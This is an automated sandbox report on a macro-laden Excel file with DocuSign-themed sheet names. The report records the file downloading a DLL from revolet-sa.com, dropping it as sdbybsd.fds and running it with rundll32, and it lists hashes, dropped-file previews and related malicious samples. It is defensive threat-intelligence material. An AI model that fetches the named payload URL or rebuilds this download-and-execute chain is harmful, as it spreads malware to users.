https://webshell.suite.office.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://management.azure.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://devnull.onenote.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://ncus.pagecontentsync.	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://messaging.office.com/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://augloop.office.com/v2	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://skyapi.live.net/Activity/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://dataservice.o365filtering.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high
https://directory.services.	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	6F379DB0-8208-423C-95BB-BA2BAE193C4D.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.232.249.186	revolet-sa.com	United States		46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383028
Start date:	07.04.2021
Start time:	07:15:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1A8C92C-1A8C92C.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@5/9@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 7.8% (good quality ratio 5.2%) Quality average: 64.3% Quality standard deviation: 45.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 4
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 204.79.197.200, 13.107.21.200, 52.147.198.201, 52.255.188.83, 52.109.32.63, 52.109.12.23, 52.109.76.35, 20.50.102.62, 23.10.249.43, 23.10.249.26, 20.82.210.154, 23.54.113.104, 20.54.26.129, 23.54.113.53, 52.155.217.156 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtCreateFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:16:31	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.232.249.186	1A8C92C-1A8C92C.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	SecuriteInfo.com.Heur.19090.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
revolet-sa.com	SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Heur.19090.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse	192.232.249.186

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	1A8C92C-1A8C92C.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Heur.19090.xls	Get hash	malicious	Browse	192.232.249.186
	SALM0BRU.exe	Get hash	malicious	Browse	162.241.148.243
	Purchase Order.8000.scan.pdf...exe	Get hash	malicious	Browse	162.241.148.243
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse	192.232.249.186
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse	192.232.249.186
	document-1251000362.xlsm	Get hash	malicious	Browse	192.185.48.186
	document-1251000362.xlsm	Get hash	malicious	Browse	192.185.48.186
	catalogue-41.xlsb	Get hash	malicious	Browse	108.167.180.111
	documents-1660683173.xlsm	Get hash	malicious	Browse	192.185.56.250
	06iKnPFk8Y.dll	Get hash	malicious	Browse	162.241.54.59
	06iKnPFk8Y.dll	Get hash	malicious	Browse	162.241.54.59
	ddff.exe	Get hash	malicious	Browse	108.179.235.108
	PowerShell_Input.ps1	Get hash	malicious	Browse	162.241.61.203
	New PO#700-20-HDO410444RF217,pdf.exe	Get hash	malicious	Browse	192.185.122.118
	Purchase Order.9000.scan.pdf...exe	Get hash	malicious	Browse	162.241.148.243
	document-1848152474.xlsm	Get hash	malicious	Browse	192.185.48.186
	7z7Q51Y8Xd.dll	Get hash	malicious	Browse	162.241.54.59

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\sdbybsd.fds	1A8C92C-1A8C92C.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.19090.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx	1A8C92C-1A8C92C.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.19090.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Heur.4923.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6F379DB0-8208-423C-95BB-BA2BAE193C4D Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	133170
Entropy (8bit):	5.370997614451883
Encrypted:	false
SSDEEP:	1536:ucQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:+VQ9DQW+zTXiJ
MD5:	69B7B557A30FF5267432F129721DB336
SHA1:	A798F7F1F92A83B6EEEDD41150DA5E1E70055384
SHA-256:	05BCC30642B392BBBAD488D67609D6AA50559F951964D24BA366A4ACA1A1F6B0
SHA-512:	63D033BE8B8B74EC9EA9AFA89E4B167F60E79943619D731990A4D49C27AFFC9E770C6C0D5FCECDD4E5517CA16C033AA11A910E031A8C22183CC43E2EA8CD7AA6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-07T05:16:22">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\k9G1a[1].fbx Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	688241
Entropy (8bit):	7.064532901692121
Encrypted:	false
SSDEEP:	12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
MD5:	7DF0611CD75FA4C02B29070728C37247
SHA1:	1095F8922D93458EFBC97612D8A5DEA8DB8325A5
SHA-256:	AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
SHA-512:	167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 5%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: 1A8C92C-1A8C92C.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://revolet-sa.com/files/countryyelow.php
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D3820000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	67889
Entropy (8bit):	7.879517466631129
Encrypted:	false
SSDEEP:	1536:Ao0cKYKrWGH5BAeWvi4qfaglMVGoIahaDHTU6hryF70Tmz:l0cRKrW2fAi/yg2sTU2yF70Tmz
MD5:	E6D93F3D603B2068EB5EAC221C0FEFBF
SHA1:	FFFAAEC1EB7D812716C42913BA9DE133E4BB9618
SHA-256:	0A38B736850161D8D00927E77658D74DB245F7C069AB5BE238A27CF3041B9971
SHA-512:	5FB002BB49E65B58823070D94ED0FE37A087EFFFE544855CB8AD91471B96AC0C0FDF63E94582990B360DF29B784739F435F745BFA6C2C27F355F6D3DF618FAB8
Malicious:	false
Reputation:	low
Preview:	.U.n.0..G.."....BMw1.%Lb<..}.D..loK.c7....V-.$N...89^^.Z...CgM....+..+;....o.gV..F...k....V..-..CAh.j...p.D..Be...i.........5.......D4......_.......^.8.f..n]..Y..>.....$./..4..o@....D...4.M.r.Q.2..m.......4.:.K....6.w..[..;hJ.{....[....$.:...TUh.c.Ax{c.^!.Ag...Q.........\...J+.4mm..G..L.*%.......F......\.S.e..CU.Q./U..O.F.......O........?...r.....M...K.....S.....u..ft.(q.R_9s.G.}..cn.u......x...]:"B.;.{.T....w....!'QNh.\|..~.......PK..........!..r.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	2187
Entropy (8bit):	6.997909904626458
Encrypted:	false
SSDEEP:	48:39Ab6US8SaM2qtXJP2xAb6UCuXPC861VmE6/hB:Wb6h5JPpb6vePajmVhB
MD5:	7D56395FC82341190F5FB25308DAC635
SHA1:	8DD48A3EBF7CEE221210A628C0317E8799BA5804
SHA-256:	9124786FDBA09FD3A66D05E00688DE91AE5A004B226AAFB73413CFA5599F2C6C
SHA-512:	916B0B9CD0BA30DA56600314F03265B9AD388BD455BC0480A3FE94005E292BD1A74ABB3FD744D9446F46DC16DC4A083BFF18308C1784EF49C2EAF86F4032D53B
Malicious:	false
Reputation:	low
Preview:	........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O........&ev&.H...........,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ...8;.;.C.dc...-.M_.>.aW.8.".....?............ ...+...b.j..O]R.W.E..m..L_.fH.d..KJ....4.V(.............;q..)..,..Q...L..p.?F...*(b.nfW.[k7....J}..wj..xP.............."G.g.........,\g.@..k...........>ds..B.f...{d./..m]...e........e.s..=_.^t......M........Z.....{.m0..O .R.YsU_..{...)....6.Y..1..;T..@."1t.<7....4.;.&<.pO>;W.{.@..S.2..9.C.A..^@... !!..L.z....sJ..GS.......f/.....EG'.^.;....>g!W.).....y@..Q.xan..kK...I.>.dB(.....y...T.....`.;.;@e.tq..4=..<...u..@.......I.A[...~...ft...8...=E....,'..M......L.j.8......W?V...,............z..O........&ev&.H...............E.x.p.o.r.t. .F.l.a.g....f...... ....=xy....i....?.[.ZD.B...w28..p?............ .....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1A8C92C-1A8C92C.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:26:59 2020, mtime=Wed Apr 7 13:16:27 2021, atime=Wed Apr 7 13:16:27 2021, length=95232, window=hide
Category:	dropped
Size (bytes):	2186
Entropy (8bit):	4.674306289635754
Encrypted:	false
SSDEEP:	24:8gFWSYsLJpAW8rz3J3DGdr77aB6mygFWSYsLJpAW8rz3J3DGdr77aB6m:8LSnkW2zEriB6pLSnkW2zEriB6
MD5:	84441CCC057EEBE00046BCCEE5FD712E
SHA1:	9754EF401AFC95BBEBBF8F037B4489B5BE13ADD4
SHA-256:	4F0117B9D779EE3523D25CB0B26E7B54BB459D460F356BDB71C7CBA83E811660
SHA-512:	1826A0A8C6081BDBB3E2FE4494575383B921D07C550D495A9BF8FA971837FB539529A2D30C8B24D70D648F42CE5D98E9DF8B91A631D5D7E3BAD6A32906B8E27D
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...=..#>........+.......+...t...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.r....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qa{..user..B.......N...R.r.....S....................Yw..e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N...R.r.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2......R.r .1A8C92~1.XLS..X......>Q`{.R.r.....R........................1.A.8.C.9.2.C.-.1.A.8.C.9.2.C...x.l.s.......\...............-.......[...........>.S......C:\Users\user\Desktop\1A8C92C-1A8C92C.xls..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.A.8.C.9.2.C.-.1.A.8.C.9.2.C...x.l.s.........:..,.LB.)...A}...`.......X.......247525...........!a..%.H.VZAj......1........-$..!a..%.H.VZAj......1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Wed Apr 7 13:16:27 2021, atime=Wed Apr 7 13:16:27 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	917
Entropy (8bit):	4.639973720652467
Encrypted:	false
SSDEEP:	12:8aY20UwWCHodvL2X+WMjA+N/E2ybD8FXIeYIe8k44t2Y+xIBjKZm:8atiSAS8HDGx7aB6m
MD5:	644D5A93116ED9316A1FAA54F91761A3
SHA1:	7D840F518710310E16CB202E7489B67C7E91CC4F
SHA-256:	95F5B418692D3A7AB4E9151122C6A64501C5E9AFC7E050892E077864E953349A
SHA-512:	8E5F3393991FAF64E36EB239884F0FA66C7EFBF7AF8A3E4EA42D64769738116A724C829FDDB218B9AD551101D89AF1CE9CE1DA4DE8DACBF2A9A79A6D8AE6FBD2
Malicious:	false
Reputation:	low
Preview:	L..................F..........h.!-..o....+... ...+...0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.r....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qa{..user..B.......N...R.r.....S....................Yw..e.n.g.i.n.e.e.r.....~.1......R.r..Desktop.h.......N...R.r.....Y..............>......o~.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......247525...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.558175664705836
Encrypted:	false
SSDEEP:	3:bDesBVomMMk9WPulGmWPulmMMk9WPulv:bSsj6aWYrWxaW1
MD5:	16030FDE60E0683DDA93C640E16D8125
SHA1:	B33C3B22585CEEBD52AE9068A10D333EB3993882
SHA-256:	5023BD2F03EA782A3E3B594325CC72520D6202EA8B5BEC21364B464A1F9FA8B6
SHA-512:	19A9313AA8393A69D4B31F4095C81AC0CCD0B561DCEDD7A710DA9BC4AFAA5F554B071C969313E5EC595CAB43A2453452808A86918F5A55051074697142309D6D
Malicious:	false
Reputation:	low
Preview:	[folders]..Desktop.LNK=0..[xls]..1A8C92C-1A8C92C.LNK=0..1A8C92C-1A8C92C.LNK=0..[xls]..1A8C92C-1A8C92C.LNK=0..

C:\Users\user\Desktop\94820000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	150963
Entropy (8bit):	7.18765504135636
Encrypted:	false
SSDEEP:	3072:sf8rmOAIyyzElBIL6lECbgBGzP5xLmECSS2jTUqyF70virW2akHTpakHPkHf8rm1:O8rmOAIyyzElBIL6lECbgB+P5NmECSRv
MD5:	75588D3C8CF44328DD58E568099D57FC
SHA1:	B19C8968892EAFC05A953CEBD7063D8A712142F0
SHA-256:	EC62FB5AE0C4089444CCE485192E3C5FCA9EAC110A33C14F3775397E4FE7D0BB
SHA-512:	EDBED5BAAA9A9477B3322E377EB93E881CCA6C9D7E4A9D0CE0E6F1D6461C318614BE55697784AAE09E24FD96A00B15906FBB791A153A4C5D3F389F15C307FBD4
Malicious:	false
Reputation:	low
Preview:	........T8..........................\.p....pratesh B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.........

C:\Users\user\sdbybsd.fds Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	688241
Entropy (8bit):	7.064532901692121
Encrypted:	false
SSDEEP:	12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
MD5:	7DF0611CD75FA4C02B29070728C37247
SHA1:	1095F8922D93458EFBC97612D8A5DEA8DB8325A5
SHA-256:	AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
SHA-512:	167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 5%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: 1A8C92C-1A8C92C.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
Entropy (8bit):	3.0873527347414935
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	1A8C92C-1A8C92C.xls
File size:	267776
MD5:	d8ed80402de2b621219044b3a2c022c5
SHA1:	e2f86c9431081da7f57cc014a9f2f7b870ea0aad
SHA256:	d98b11f1599985cc16c8dd10ea53ea5a1b9ac752d5d30c460c198b4a2a83ad9b
SHA512:	1bc7b3a5973019ded3a136824ea54653d3189d729e3e07a811082844829362c3f4dd78c478d2aaea0c0e044092d4d96cd0a6b1e8b7ccbb8ba89ad1814e723540
SSDEEP:	6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0E:FhE
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "1A8C92C-1A8C92C.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Last Saved By:	5
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-04-06 14:04:37
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.342986545458
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
